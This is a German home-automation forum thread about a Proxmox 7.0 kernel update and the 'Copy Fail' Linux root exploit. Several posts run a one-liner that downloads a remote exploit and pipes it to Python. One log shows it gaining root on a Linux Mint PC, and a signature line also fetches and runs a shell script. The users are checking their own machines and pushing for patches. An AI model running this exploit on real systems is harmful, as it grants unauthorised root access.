Weiter zum Inhalt
  • Home
  • Aktuell
  • Tags
  • 0 Ungelesen 0
  • Kategorien
  • Unreplied
  • Beliebt
  • GitHub
  • Docu
  • Hilfe
Skins
  • Hell
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dunkel
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Standard: (Kein Skin)
  • Kein Skin
Einklappen
ioBroker Logo

Community Forum

donate donate
  1. ioBroker Community Home
  2. Deutsch
  3. Off Topic
  4. Proxmox
  5. Proxmox - 7er Linux-Kernel wird per APT verteilt ....

NEWS

  • Neuer ioBroker-Blog online: Monatsrückblick März/April 2026
    BluefoxB
    Bluefox
    8
    1
    683

  • Verwendung von KI bitte immer deutlich kennzeichnen
    HomoranH
    Homoran
    10
    1
    526

  • Monatsrückblick Januar/Februar 2026 ist online!
    BluefoxB
    Bluefox
    18
    1
    1.1k

Proxmox - 7er Linux-Kernel wird per APT verteilt ....

Geplant Angeheftet Gesperrt Verschoben Proxmox
17 Beiträge 3 Kommentatoren 257 Aufrufe 4 Beobachtet
  • Älteste zuerst
  • Neuste zuerst
  • Meiste Stimmen
Antworten
  • In einem neuen Thema antworten
Anmelden zum Antworten
Dieses Thema wurde gelöscht. Nur Nutzer mit entsprechenden Rechten können es sehen.
  • MartinPM Offline
    MartinPM Offline
    MartinP
    schrieb am zuletzt editiert von MartinP
    #1

    Gleich wird es spannend ...

    Unpacking proxmox-kernel-7.0.0-3-pve-signed (7.0.0-3) ...
    

    Eigentlich habe ich Vorbehalte gegen Versionen mit einer "0" nach dem ersten Punkt 😀

    Das ist auch interessant bzgl. des Vorgänger Kernels 6.17-6

    Automatic installation of modules for kernel 6.17.13-6-pve was skipped since the kernel headers for this kernel do not seem to be installed.
    

    Intel(R) Celeron(R) CPU N3000 @1.04GHz 8G RAM 480G SSD * Virtualization : unprivileged lxc container on Proxmox * 6 GByte RAM für den iobroker Container * Remote-Access über Wireguard meiner Fritzbox

    Thomas BraunT 1 Antwort Letzte Antwort
    0
    • MartinPM MartinP

      Gleich wird es spannend ...

      Unpacking proxmox-kernel-7.0.0-3-pve-signed (7.0.0-3) ...
      

      Eigentlich habe ich Vorbehalte gegen Versionen mit einer "0" nach dem ersten Punkt 😀

      Das ist auch interessant bzgl. des Vorgänger Kernels 6.17-6

      Automatic installation of modules for kernel 6.17.13-6-pve was skipped since the kernel headers for this kernel do not seem to be installed.
      
      Thomas BraunT Online
      Thomas BraunT Online
      Thomas Braun
      Most Active
      schrieb am zuletzt editiert von Thomas Braun
      #2

      @MartinP sagte:

      Eigentlich habe ich Vorbehalte gegen Versionen mit einer "0" nach dem ersten Punkt

      Beim Kernel hat das nichts zu sagen. Die Major-Version wird da nicht (mehr) bei größeren technischen Sprüngen erhöht sondern dann, wenn Linus Torwalds die Finger und Zehen zum zählen der Versionsnummern ausgehen. Deswegen jetzt der Sprung von 6.19.x auf 7.0.y.

      Linux-Werkzeugkasten:
      https://forum.iobroker.net/topic/42952/der-kleine-iobroker-linux-werkzeugkasten
      NodeJS Fixer Skript:
      https://forum.iobroker.net/topic/68035/iob-node-fix-skript
      iob_diag: curl -sLf -o diag.sh https://iobroker.net/diag.sh && bash diag.sh

      1 Antwort Letzte Antwort
      0
      • MartinPM Offline
        MartinPM Offline
        MartinP
        schrieb am zuletzt editiert von
        #3

        Alles smooth verlaufen. Alle Zahnräder drehen nach dem Update wieder

        Intel(R) Celeron(R) CPU N3000 @1.04GHz 8G RAM 480G SSD * Virtualization : unprivileged lxc container on Proxmox * 6 GByte RAM für den iobroker Container * Remote-Access über Wireguard meiner Fritzbox

        Meister MopperM 1 Antwort Letzte Antwort
        0
        • MartinPM MartinP

          Alles smooth verlaufen. Alle Zahnräder drehen nach dem Update wieder

          Meister MopperM Online
          Meister MopperM Online
          Meister Mopper
          Most Active
          schrieb am zuletzt editiert von
          #4

          @MartinP sagte:

          Alles smooth verlaufen. Alle Zahnräder drehen nach dem Update wieder

          Auch wenn Linus Torwalds dies aus zeitlichen Gründen macht, bin ich bei '*.0' auch vorsichtig.
          Man hat ja die Möglichkeit, den laufenden Kernel zu pinnen und im Proxmox-Forum zu schauen, was sich tut.

          Ich beobachte lieber noch ein bisschen 😊 .

          Proxmox und HA - dank KI/AI endlich "blocklyfrei"

          Thomas BraunT 1 Antwort Letzte Antwort
          0
          • Meister MopperM Meister Mopper

            @MartinP sagte:

            Alles smooth verlaufen. Alle Zahnräder drehen nach dem Update wieder

            Auch wenn Linus Torwalds dies aus zeitlichen Gründen macht, bin ich bei '*.0' auch vorsichtig.
            Man hat ja die Möglichkeit, den laufenden Kernel zu pinnen und im Proxmox-Forum zu schauen, was sich tut.

            Ich beobachte lieber noch ein bisschen 😊 .

            Thomas BraunT Online
            Thomas BraunT Online
            Thomas Braun
            Most Active
            schrieb am zuletzt editiert von
            #5

            @Meister-Mopper sagte:

            bin ich bei '*.0' auch vorsichtig.

            Kann man ja sein. Aber die gleiche Vorsicht musst du dann auch von 6.13 auf 6.14 walten lassen. Wie gesagt, die Versionsnummern beim Kernel sind vollkommen ohne Aussagen über größere Änderungen.
            BTW:

            [thomas@roamer ~]$ uname -r
            7.0.2-arch1-1
            [thomas@roamer ~]$ 
            

            Linux-Werkzeugkasten:
            https://forum.iobroker.net/topic/42952/der-kleine-iobroker-linux-werkzeugkasten
            NodeJS Fixer Skript:
            https://forum.iobroker.net/topic/68035/iob-node-fix-skript
            iob_diag: curl -sLf -o diag.sh https://iobroker.net/diag.sh && bash diag.sh

            Meister MopperM 1 Antwort Letzte Antwort
            0
            • Thomas BraunT Thomas Braun

              @Meister-Mopper sagte:

              bin ich bei '*.0' auch vorsichtig.

              Kann man ja sein. Aber die gleiche Vorsicht musst du dann auch von 6.13 auf 6.14 walten lassen. Wie gesagt, die Versionsnummern beim Kernel sind vollkommen ohne Aussagen über größere Änderungen.
              BTW:

              [thomas@roamer ~]$ uname -r
              7.0.2-arch1-1
              [thomas@roamer ~]$ 
              
              Meister MopperM Online
              Meister MopperM Online
              Meister Mopper
              Most Active
              schrieb am zuletzt editiert von Meister Mopper
              #6

              @Thomas-Braun sagte:

              @Meister-Mopper sagte:

              bin ich bei '*.0' auch vorsichtig.

              Kann man ja sein. Aber die gleiche Vorsicht musst du dann auch von 6.13 auf 6.14 walten lassen. Wie gesagt, die Versionsnummern beim Kernel sind vollkommen ohne Aussagen über größere Änderungen.
              BTW:

              [thomas@roamer ~]$ uname -r
              7.0.2-arch1-1
              [thomas@roamer ~]$ 
              

              Gewohnheitsgemäß bleibe ich bei meinem Produktivsystem vorerst beim alten Kernel.

              @Thomas-Braun sagte:

              6.13 auf 6.14

              Und auch da kann ich pinnen.

              Proxmox und HA - dank KI/AI endlich "blocklyfrei"

              1 Antwort Letzte Antwort
              0
              • MartinPM Offline
                MartinPM Offline
                MartinP
                schrieb am zuletzt editiert von MartinP
                #7

                Dann musst Du aber ggfs mit der Kernel-Verwundbarkeit für "copy fail" leben...

                https://www.heise.de/news/Copy-Fail-Linux-root-in-allen-grossen-Distributionen-mit-732-Byte-Python-11277590.html

                Auf meiner Proxmox-Kiste (in einem LXC-Container)

                frigate@ubuntu-frigate-privileged:~$ curl https://copy.fail/exp | python3 && su
                  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                                 Dload  Upload   Total   Spent    Left  Speed
                100   731    0   731    0     0   2924      0 --:--:-- --:--:-- --:--:--  2935
                Password: su: Authentication failure
                Password: 
                
                

                Auf meinem Linux-Mint-PC

                martin@martin-D2836-S1:~$ curl https://copy.fail/exp | python3 && su
                  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                                 Dload  Upload   Total   Spent    Left  Speed
                100   731    0   731    0     0   5595      0 --:--:-- --:--:-- --:--:--  5666
                # ls
                '2026-01-26 16-59-47.mp4'   Videos		   output.tem
                 Arduino		    Vorlagen		   output_text.txt
                 Auswahl_238.png	    coral		   page.htm
                 Bilder			    ems_esp_flasher	   programs
                 DemonEditor		    esp_test_ota_prog.sh   pwmkurve.png
                 Dokumente		    gitea		   serial_ACM0.sh
                
                

                Der Unterschied zwischen PVE und Linux mint ist, dass bei Mint su ohne Passwordeingabe erreicht werden kann...

                Intel(R) Celeron(R) CPU N3000 @1.04GHz 8G RAM 480G SSD * Virtualization : unprivileged lxc container on Proxmox * 6 GByte RAM für den iobroker Container * Remote-Access über Wireguard meiner Fritzbox

                Thomas BraunT Meister MopperM 2 Antworten Letzte Antwort
                0
                • MartinPM MartinP

                  Dann musst Du aber ggfs mit der Kernel-Verwundbarkeit für "copy fail" leben...

                  https://www.heise.de/news/Copy-Fail-Linux-root-in-allen-grossen-Distributionen-mit-732-Byte-Python-11277590.html

                  Auf meiner Proxmox-Kiste (in einem LXC-Container)

                  frigate@ubuntu-frigate-privileged:~$ curl https://copy.fail/exp | python3 && su
                    % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                                   Dload  Upload   Total   Spent    Left  Speed
                  100   731    0   731    0     0   2924      0 --:--:-- --:--:-- --:--:--  2935
                  Password: su: Authentication failure
                  Password: 
                  
                  

                  Auf meinem Linux-Mint-PC

                  martin@martin-D2836-S1:~$ curl https://copy.fail/exp | python3 && su
                    % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                                   Dload  Upload   Total   Spent    Left  Speed
                  100   731    0   731    0     0   5595      0 --:--:-- --:--:-- --:--:--  5666
                  # ls
                  '2026-01-26 16-59-47.mp4'   Videos		   output.tem
                   Arduino		    Vorlagen		   output_text.txt
                   Auswahl_238.png	    coral		   page.htm
                   Bilder			    ems_esp_flasher	   programs
                   DemonEditor		    esp_test_ota_prog.sh   pwmkurve.png
                   Dokumente		    gitea		   serial_ACM0.sh
                  
                  

                  Der Unterschied zwischen PVE und Linux mint ist, dass bei Mint su ohne Passwordeingabe erreicht werden kann...

                  Thomas BraunT Online
                  Thomas BraunT Online
                  Thomas Braun
                  Most Active
                  schrieb am zuletzt editiert von Thomas Braun
                  #8

                  @MartinP sagte:

                  curl https://copy.fail/exp | python3 && su

                  echad@chet:~ $ curl https://copy.fail/exp | python3 && su
                    % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                                   Dload  Upload   Total   Spent    Left  Speed
                  100   731    0   731    0     0   1389      0 --:--:-- --:--:-- --:--:--  1389
                  sh: 1: su: Exec format error
                  -bash: /usr/bin/su: Kann die Binärdatei nicht ausführen: Fehler im Format der Programmdatei
                  echad@chet:~ $ 
                  
                  [thomas@roamer ~]$ curl https://copy.fail/exp | python3 && su
                    % Total    % Received % Xferd  Average Speed  Time    Time    Time   Current
                                                   Dload  Upload  Total   Spent   Left   Speed
                  100    731   0    731   0      0   1054      0                              0
                  Passwort: su: Fehler beim Ändern des Authentifizierungstoken
                  Passwort: 
                  

                  Hier funktioniert das nicht.

                  Linux-Werkzeugkasten:
                  https://forum.iobroker.net/topic/42952/der-kleine-iobroker-linux-werkzeugkasten
                  NodeJS Fixer Skript:
                  https://forum.iobroker.net/topic/68035/iob-node-fix-skript
                  iob_diag: curl -sLf -o diag.sh https://iobroker.net/diag.sh && bash diag.sh

                  MartinPM 1 Antwort Letzte Antwort
                  0
                  • MartinPM MartinP

                    Dann musst Du aber ggfs mit der Kernel-Verwundbarkeit für "copy fail" leben...

                    https://www.heise.de/news/Copy-Fail-Linux-root-in-allen-grossen-Distributionen-mit-732-Byte-Python-11277590.html

                    Auf meiner Proxmox-Kiste (in einem LXC-Container)

                    frigate@ubuntu-frigate-privileged:~$ curl https://copy.fail/exp | python3 && su
                      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                                     Dload  Upload   Total   Spent    Left  Speed
                    100   731    0   731    0     0   2924      0 --:--:-- --:--:-- --:--:--  2935
                    Password: su: Authentication failure
                    Password: 
                    
                    

                    Auf meinem Linux-Mint-PC

                    martin@martin-D2836-S1:~$ curl https://copy.fail/exp | python3 && su
                      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                                     Dload  Upload   Total   Spent    Left  Speed
                    100   731    0   731    0     0   5595      0 --:--:-- --:--:-- --:--:--  5666
                    # ls
                    '2026-01-26 16-59-47.mp4'   Videos		   output.tem
                     Arduino		    Vorlagen		   output_text.txt
                     Auswahl_238.png	    coral		   page.htm
                     Bilder			    ems_esp_flasher	   programs
                     DemonEditor		    esp_test_ota_prog.sh   pwmkurve.png
                     Dokumente		    gitea		   serial_ACM0.sh
                    
                    

                    Der Unterschied zwischen PVE und Linux mint ist, dass bei Mint su ohne Passwordeingabe erreicht werden kann...

                    Meister MopperM Online
                    Meister MopperM Online
                    Meister Mopper
                    Most Active
                    schrieb am zuletzt editiert von
                    #9

                    @MartinP sagte:

                    Dann musst Du aber ggfs mit der Kernel-Verwundbarkeit für "copy fail" leben...

                    Ich sehe das nicht als "Zero Day" Geschichte, sondern als "nutze regelmäßige Updates".

                    Proxmox und HA - dank KI/AI endlich "blocklyfrei"

                    1 Antwort Letzte Antwort
                    0
                    • Thomas BraunT Thomas Braun

                      @MartinP sagte:

                      curl https://copy.fail/exp | python3 && su

                      echad@chet:~ $ curl https://copy.fail/exp | python3 && su
                        % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                                       Dload  Upload   Total   Spent    Left  Speed
                      100   731    0   731    0     0   1389      0 --:--:-- --:--:-- --:--:--  1389
                      sh: 1: su: Exec format error
                      -bash: /usr/bin/su: Kann die Binärdatei nicht ausführen: Fehler im Format der Programmdatei
                      echad@chet:~ $ 
                      
                      [thomas@roamer ~]$ curl https://copy.fail/exp | python3 && su
                        % Total    % Received % Xferd  Average Speed  Time    Time    Time   Current
                                                       Dload  Upload  Total   Spent   Left   Speed
                      100    731   0    731   0      0   1054      0                              0
                      Passwort: su: Fehler beim Ändern des Authentifizierungstoken
                      Passwort: 
                      

                      Hier funktioniert das nicht.

                      MartinPM Offline
                      MartinPM Offline
                      MartinP
                      schrieb am zuletzt editiert von
                      #10

                      @Thomas-Braun sagte:

                      Hier funktioniert das nicht.

                      Hat Dein System überhaupt eine Intel x64 CPU?
                      Dafür ist das Exploit geschrieben.

                      Das heißt aber nicht, dass die Lücke nicht auch auf Kernels für ARM-Prozessoren existiert ....

                      Intel(R) Celeron(R) CPU N3000 @1.04GHz 8G RAM 480G SSD * Virtualization : unprivileged lxc container on Proxmox * 6 GByte RAM für den iobroker Container * Remote-Access über Wireguard meiner Fritzbox

                      Thomas BraunT MartinPM 2 Antworten Letzte Antwort
                      0
                      • MartinPM MartinP

                        @Thomas-Braun sagte:

                        Hier funktioniert das nicht.

                        Hat Dein System überhaupt eine Intel x64 CPU?
                        Dafür ist das Exploit geschrieben.

                        Das heißt aber nicht, dass die Lücke nicht auch auf Kernels für ARM-Prozessoren existiert ....

                        Thomas BraunT Online
                        Thomas BraunT Online
                        Thomas Braun
                        Most Active
                        schrieb am zuletzt editiert von
                        #11

                        @MartinP

                        Der host roamer ja:

                        [thomas@roamer ~]$ fastfetch 
                                             ./o.                   thomas@roamer
                                           ./sssso-                 -------------
                                         `:osssssss+-               OS: EndeavourOS x86_64
                                       `:+sssssssssso/.             Host: 83A2 (Lenovo V17 G4 IRU)
                                     `-/ossssssssssssso/.           Kernel: Linux 7.0.2-arch1-1
                                   `-/+sssssssssssssssso+:`         Uptime: 47 mins
                                 `-:/+sssssssssssssssssso+/.        Packages: 1383 (pacman)
                               `.://osssssssssssssssssssso++-       Shell: bash 5.3.9
                              .://+ssssssssssssssssssssssso++:      Display (AUO439D): 1920x1080 in 17", 60 Hz [Built-in]
                            .:///ossssssssssssssssssssssssso++:     DE: KDE Plasma 6.6.4
                          `:////ssssssssssssssssssssssssssso+++.    WM: KWin (Wayland)
                        `-////+ssssssssssssssssssssssssssso++++-    WM Theme: Breeze
                         `..-+oosssssssssssssssssssssssso+++++/`    Theme: Breeze (Dark) [Qt], Breeze-Dark [GTK2], Breeze [GTK3]
                           ./++++++++++++++++++++++++++++++/:.      Icons: breeze-dark [Qt], breeze-dark [GTK2/3/4]
                          `:::::::::::::::::::::::::------``        Font: Noto Sans (10pt) [Qt], Noto Sans (10pt) [GTK2/3/4]
                                                                    Cursor: breeze (24px)
                                                                    Terminal: konsole 26.4.0
                                                                    CPU: 13th Gen Intel(R) Core(TM) i5-1335U (12) @ 4.60 GHz
                                                                    GPU: Intel Iris Xe Graphics @ 1.25 GHz [Integrated]
                                                                    Memory: 4.36 GiB / 15.34 GiB (28%)
                                                                    Swap: 0 B / 16.88 GiB (0%)
                                                                    Disk (/): 107.75 GiB / 912.64 GiB (12%) - btrfs
                                                                    Disk (/run/media/thomas/Ventoy): 55.31 GiB / 58.56 GiB (94%) - exfat [External]
                                                                    Local IP (wlan0): 192.168.178.44/24
                                                                    Battery (L20M3PF0): 59% [Discharging]
                                                                    Locale: de_DE.UTF-8
                        
                                                                                            
                                                                                            
                        [thomas@roamer ~]$ 
                        

                        Auf dem echad (Ist ein Raspberry4) bin ich nur zufällig gewesen.

                        Linux-Werkzeugkasten:
                        https://forum.iobroker.net/topic/42952/der-kleine-iobroker-linux-werkzeugkasten
                        NodeJS Fixer Skript:
                        https://forum.iobroker.net/topic/68035/iob-node-fix-skript
                        iob_diag: curl -sLf -o diag.sh https://iobroker.net/diag.sh && bash diag.sh

                        1 Antwort Letzte Antwort
                        0
                        • MartinPM MartinP

                          @Thomas-Braun sagte:

                          Hier funktioniert das nicht.

                          Hat Dein System überhaupt eine Intel x64 CPU?
                          Dafür ist das Exploit geschrieben.

                          Das heißt aber nicht, dass die Lücke nicht auch auf Kernels für ARM-Prozessoren existiert ....

                          MartinPM Offline
                          MartinPM Offline
                          MartinP
                          schrieb am zuletzt editiert von MartinP
                          #12

                          @meister-mopper

                          Ich sehe das nicht als "Zero Day" Geschichte

                          Es ist inzwischen keine Zero Day Lücke mehr, weil ein Beispiel-Exploit veröffentlicht wurde, die Kernel-Entwickler schon 4 Wochen informiert sind (also eher eine 28-Day Lücke), und es Patches gibt ...

                          Ein Zero Day (auch manchmal „0day“ genannt) ist eine Sicherheitslücke, die den Entwicklern der betroffenen Anwendung noch nicht gemeldet wurde, sodass sie „null Tage Zeit“ hatten, sie zu beheben – daher der Name.

                          Bist Du der Meinung, dass das die Lücke harmloser macht, sodass man mit dem Einspielen von Fixes länger, als bei einem Zero-Day warten kann?

                          Intel(R) Celeron(R) CPU N3000 @1.04GHz 8G RAM 480G SSD * Virtualization : unprivileged lxc container on Proxmox * 6 GByte RAM für den iobroker Container * Remote-Access über Wireguard meiner Fritzbox

                          Thomas BraunT Meister MopperM 2 Antworten Letzte Antwort
                          0
                          • MartinPM MartinP

                            @meister-mopper

                            Ich sehe das nicht als "Zero Day" Geschichte

                            Es ist inzwischen keine Zero Day Lücke mehr, weil ein Beispiel-Exploit veröffentlicht wurde, die Kernel-Entwickler schon 4 Wochen informiert sind (also eher eine 28-Day Lücke), und es Patches gibt ...

                            Ein Zero Day (auch manchmal „0day“ genannt) ist eine Sicherheitslücke, die den Entwicklern der betroffenen Anwendung noch nicht gemeldet wurde, sodass sie „null Tage Zeit“ hatten, sie zu beheben – daher der Name.

                            Bist Du der Meinung, dass das die Lücke harmloser macht, sodass man mit dem Einspielen von Fixes länger, als bei einem Zero-Day warten kann?

                            Thomas BraunT Online
                            Thomas BraunT Online
                            Thomas Braun
                            Most Active
                            schrieb am zuletzt editiert von
                            #13

                            @MartinP

                            Deswegen gilt:

                            However, for most users, the best approach is to install vendor kernel updates and reboot into the patched kernel.

                            Also was ich auch immer sage: Kiste aktuell halten. Immer und regelmäßig.

                            Linux-Werkzeugkasten:
                            https://forum.iobroker.net/topic/42952/der-kleine-iobroker-linux-werkzeugkasten
                            NodeJS Fixer Skript:
                            https://forum.iobroker.net/topic/68035/iob-node-fix-skript
                            iob_diag: curl -sLf -o diag.sh https://iobroker.net/diag.sh && bash diag.sh

                            1 Antwort Letzte Antwort
                            0
                            • MartinPM MartinP

                              @meister-mopper

                              Ich sehe das nicht als "Zero Day" Geschichte

                              Es ist inzwischen keine Zero Day Lücke mehr, weil ein Beispiel-Exploit veröffentlicht wurde, die Kernel-Entwickler schon 4 Wochen informiert sind (also eher eine 28-Day Lücke), und es Patches gibt ...

                              Ein Zero Day (auch manchmal „0day“ genannt) ist eine Sicherheitslücke, die den Entwicklern der betroffenen Anwendung noch nicht gemeldet wurde, sodass sie „null Tage Zeit“ hatten, sie zu beheben – daher der Name.

                              Bist Du der Meinung, dass das die Lücke harmloser macht, sodass man mit dem Einspielen von Fixes länger, als bei einem Zero-Day warten kann?

                              Meister MopperM Online
                              Meister MopperM Online
                              Meister Mopper
                              Most Active
                              schrieb am zuletzt editiert von
                              #14

                              @MartinP

                              Bist du der Meinung, dass der Proxmox 7.x Kernel installiert werden sollte, weil er das System sicherer macht? Und wenn ja warum und bitte mit Begründung.

                              Danke!

                              Proxmox und HA - dank KI/AI endlich "blocklyfrei"

                              Thomas BraunT 1 Antwort Letzte Antwort
                              0
                              • Meister MopperM Meister Mopper

                                @MartinP

                                Bist du der Meinung, dass der Proxmox 7.x Kernel installiert werden sollte, weil er das System sicherer macht? Und wenn ja warum und bitte mit Begründung.

                                Danke!

                                Thomas BraunT Online
                                Thomas BraunT Online
                                Thomas Braun
                                Most Active
                                schrieb am zuletzt editiert von Thomas Braun
                                #15

                                @Meister-Mopper sagte:

                                Bist du der Meinung, dass der Proxmox 7.x Kernel installiert werden sollte, weil er das System sicherer macht?

                                Users and administrators should apply the latest kernel security updates from their distribution as soon as possible.

                                However, for most users, the best approach is to install vendor kernel updates and reboot into the patched kernel.

                                Linux-Werkzeugkasten:
                                https://forum.iobroker.net/topic/42952/der-kleine-iobroker-linux-werkzeugkasten
                                NodeJS Fixer Skript:
                                https://forum.iobroker.net/topic/68035/iob-node-fix-skript
                                iob_diag: curl -sLf -o diag.sh https://iobroker.net/diag.sh && bash diag.sh

                                1 Antwort Letzte Antwort
                                0
                                • MartinPM Offline
                                  MartinPM Offline
                                  MartinP
                                  schrieb am zuletzt editiert von
                                  #16

                                  Bist du der Meinung, dass der Proxmox 7.x Kernel installiert werden sollte, weil er das System sicherer macht?

                                  Bist du der festen Überzeugung dass die Copy Fail Sicherheitslücke in einer typischen iobroker Installation NICHT ausgenutzt werden kann?

                                  Im Kernel log steht, dass die Lücke dort am 22.Apr geschlossen wurde

                                  https://lore.kernel.org/linux-cve-announce/?t=20260422135722

                                  https://www.reddit.com/r/Proxmox/comments/1szc46a/this_will_be_fun_cve202631431/

                                  PVE just pushed kernel 7 in non-enterprise and the bug was repaired in kernel 6.19.12 or higher.

                                  Intel(R) Celeron(R) CPU N3000 @1.04GHz 8G RAM 480G SSD * Virtualization : unprivileged lxc container on Proxmox * 6 GByte RAM für den iobroker Container * Remote-Access über Wireguard meiner Fritzbox

                                  Meister MopperM 1 Antwort Letzte Antwort
                                  0
                                  • MartinPM MartinP

                                    Bist du der Meinung, dass der Proxmox 7.x Kernel installiert werden sollte, weil er das System sicherer macht?

                                    Bist du der festen Überzeugung dass die Copy Fail Sicherheitslücke in einer typischen iobroker Installation NICHT ausgenutzt werden kann?

                                    Im Kernel log steht, dass die Lücke dort am 22.Apr geschlossen wurde

                                    https://lore.kernel.org/linux-cve-announce/?t=20260422135722

                                    https://www.reddit.com/r/Proxmox/comments/1szc46a/this_will_be_fun_cve202631431/

                                    PVE just pushed kernel 7 in non-enterprise and the bug was repaired in kernel 6.19.12 or higher.

                                    Meister MopperM Online
                                    Meister MopperM Online
                                    Meister Mopper
                                    Most Active
                                    schrieb am zuletzt editiert von
                                    #17

                                    @MartinP

                                    Vielen Dank, das ist somit sehr dringlich und wird von Proxmox auch im Forum empfohlen.

                                    Die Updates laufen bei mir bereits.

                                    Proxmox und HA - dank KI/AI endlich "blocklyfrei"

                                    1 Antwort Letzte Antwort
                                    0

                                    Hey! Du scheinst an dieser Unterhaltung interessiert zu sein, hast aber noch kein Konto.

                                    Hast du es satt, bei jedem Besuch durch die gleichen Beiträge zu scrollen? Wenn du dich für ein Konto anmeldest, kommst du immer genau dorthin zurück, wo du zuvor warst, und kannst dich über neue Antworten benachrichtigen lassen (entweder per E-Mail oder Push-Benachrichtigung). Du kannst auch Lesezeichen speichern und Beiträge positiv bewerten, um anderen Community-Mitgliedern deine Wertschätzung zu zeigen.

                                    Mit deinem Input könnte dieser Beitrag noch besser werden 💗

                                    Registrieren Anmelden
                                    Antworten
                                    • In einem neuen Thema antworten
                                    Anmelden zum Antworten
                                    • Älteste zuerst
                                    • Neuste zuerst
                                    • Meiste Stimmen


                                    Support us

                                    ioBroker
                                    Community Adapters
                                    Donate

                                    371

                                    Online

                                    32.8k

                                    Benutzer

                                    82.9k

                                    Themen

                                    1.3m

                                    Beiträge
                                    Community
                                    Impressum | Datenschutz-Bestimmungen | Nutzungsbedingungen | Einwilligungseinstellungen
                                    ioBroker Community 2014-2025
                                    logo
                                    • Anmelden

                                    • Du hast noch kein Konto? Registrieren

                                    • Anmelden oder registrieren, um zu suchen
                                    • Erster Beitrag
                                      Letzter Beitrag
                                    0
                                    • Home
                                    • Aktuell
                                    • Tags
                                    • Ungelesen 0
                                    • Kategorien
                                    • Unreplied
                                    • Beliebt
                                    • GitHub
                                    • Docu
                                    • Hilfe